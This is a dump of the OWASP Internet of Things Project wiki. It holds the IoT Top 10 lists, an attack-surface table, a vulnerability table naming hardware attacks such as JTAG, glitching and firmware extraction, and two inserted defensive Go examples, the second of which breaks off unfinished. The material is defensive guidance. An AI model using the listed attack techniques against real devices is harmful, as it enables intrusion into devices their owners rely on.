The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write interoperable applications regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=249761OWASP Internet of Things Project2019-04-05T20:36:36Z<p>Aaron.guzman: /* Collaboration */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
<br />
|-<br />
|}<br />
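The Update Mechanism, Device Firmware and Device Network Services rows above (unsigned updates, missing update verification, firmware downgrade, firmware loaded over an insecure channel) all come down to one device-side check: accept an update only if it is signed by the vendor, bound to the image actually received, and newer than what is installed. The Go program below is an added example written for this page, not code from the OWASP IoT Project. The product name, version numbers, firmware bytes and the fixed key seed are constructed; a real vendor key would be generated and held in an HSM, with only the public key burned into devices.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Manifest describes one update. The vendor signs the manifest bytes; the
// image is bound to it through its SHA-256 digest, and Version lets the
// device refuse a downgrade.
type Manifest struct {
	Product  string `json:"product"`
	Version  uint32 `json:"version"`
	ImageSHA string `json:"image_sha256"`
}

// SignedUpdate is what the device receives, by whatever channel.
type SignedUpdate struct {
	Manifest  []byte // exact bytes that were signed
	Signature []byte // Ed25519 signature over Manifest
	Image     []byte // firmware payload
}

var (
	ErrBadSignature = errors.New("manifest signature invalid")
	ErrWrongProduct = errors.New("manifest is for a different product")
	ErrRollback     = errors.New("update is not newer than the installed version")
	ErrImageDigest  = errors.New("image digest does not match manifest")
)

// DemoKeyPair derives a key pair from a constructed, fixed seed so the example
// is reproducible. A production vendor key is generated and kept in an HSM.
func DemoKeyPair() (ed25519.PublicKey, ed25519.PrivateKey) {
	priv := ed25519.NewKeyFromSeed(bytes.Repeat([]byte{0x42}, ed25519.SeedSize))
	return priv.Public().(ed25519.PublicKey), priv
}

// BuildUpdate is the vendor side: digest the image, serialise the manifest,
// sign the manifest bytes.
func BuildUpdate(priv ed25519.PrivateKey, product string, version uint32, image []byte) (SignedUpdate, error) {
	sum := sha256.Sum256(image)
	mb, err := json.Marshal(Manifest{Product: product, Version: version, ImageSHA: hex.EncodeToString(sum[:])})
	if err != nil {
		return SignedUpdate{}, err
	}
	return SignedUpdate{Manifest: mb, Signature: ed25519.Sign(priv, mb), Image: image}, nil
}

// VerifyUpdate is the device side. The signature is checked first, so the JSON
// decoder and the version logic only ever see vendor-authenticated bytes.
func VerifyUpdate(pub ed25519.PublicKey, product string, installed uint32, u SignedUpdate) (Manifest, error) {
	if !ed25519.Verify(pub, u.Manifest, u.Signature) {
		return Manifest{}, ErrBadSignature
	}
	var m Manifest
	if err := json.Unmarshal(u.Manifest, &m); err != nil {
		return Manifest{}, err
	}
	if m.Product != product {
		return Manifest{}, ErrWrongProduct
	}
	if m.Version <= installed { // anti-rollback: an equal version is rejected too
		return Manifest{}, ErrRollback
	}
	want, err := hex.DecodeString(m.ImageSHA)
	sum := sha256.Sum256(u.Image)
	if err != nil || !bytes.Equal(sum[:], want) {
		return Manifest{}, ErrImageDigest
	}
	return m, nil
}

func main() {
	pub, priv := DemoKeyPair()
	image := []byte("constructed firmware image, version 7") // placeholder payload
	upd, _ := BuildUpdate(priv, "sensor-x1", 7, image)

	m, err := VerifyUpdate(pub, "sensor-x1", 6, upd)
	fmt.Println("device on v6:", m.Version, err)

	tampered := upd // manifest and signature intact, payload altered in transit
	tampered.Image = append([]byte(nil), image...)
	tampered.Image[0] ^= 0xff
	_, err = VerifyUpdate(pub, "sensor-x1", 6, tampered)
	fmt.Println("tampered image:", err)

	_, err = VerifyUpdate(pub, "sensor-x1", 7, upd) // replay of the release already installed
	fmt.Println("replay/rollback:", err)
}
```

The image is checked against the digest carried in the signed manifest rather than being signed directly, so a large image can be streamed and hashed on a small device. Delivering the update over TLS addresses the "Firmware loaded over insecure channel" row but is not a substitute for the signature: TLS protects the channel, the signature protects the artefact wherever it was fetched from, including a mirror or a world-writable update directory.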
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to, for example, '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, preset passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, an attacker can modify the execution of the firmware on the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow, or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can obtain full console access to the device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
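The first three rows of the table (Username Enumeration, Weak Passwords, Account Lockout) are usually fixed in the same piece of code, the login handler. The Go type below is an added example for this page, not code from the OWASP IoT Project: it returns one generic error for every failure, does the same hashing work for unknown users as for real ones so the response time does not reveal which usernames exist, refuses the '1234'/'123456'/vendor-default class of passwords at enrollment, and locks an account after five consecutive failures. The banned-password list and the salted, iterated SHA-256 hash are constructed stand-ins chosen to keep the example dependency-free; a shipping device should use a password KDF such as bcrypt, scrypt or Argon2 and a much larger breached-password list.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"time"
)

const (
	maxFailures  = 5                // consecutive failures before lockout
	lockDuration = 15 * time.Minute // how long the lock lasts
	hashRounds   = 10000            // iterations of the stand-in hash
)

var (
	// One error for every login failure: unknown user, wrong password and
	// locked account are indistinguishable to the caller.
	ErrAuthFailed = errors.New("authentication failed")
	// Returned at enrollment or password change only, never at login.
	ErrWeakPassword = errors.New("password too short or on the banned list")
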